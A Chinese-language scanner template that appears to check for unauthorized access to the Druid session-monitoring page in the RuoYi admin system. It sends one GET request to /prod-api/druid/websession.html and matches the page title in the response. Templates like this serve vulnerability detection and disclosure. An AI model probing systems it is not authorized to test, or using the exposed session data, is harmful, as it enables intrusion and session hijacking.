漏洞描述
若依管理系统未授权访问
id: ruoyi-druid-unauth
info:
name: 若依管理系统未授权访问
author: Str1am
severity: high
verified: true
description: |-
若依管理系统未授权访问
tags: ruoyi,druid,unauth
created: 2023/07/07
rules:
r0:
request:
method: GET
path: /prod-api/druid/websession.html
expression: response.status == 200 && response.body.bcontains(b'Druid Web Session Stat') && response.body.bcontains(b'Web Session Stat')
expression: r0()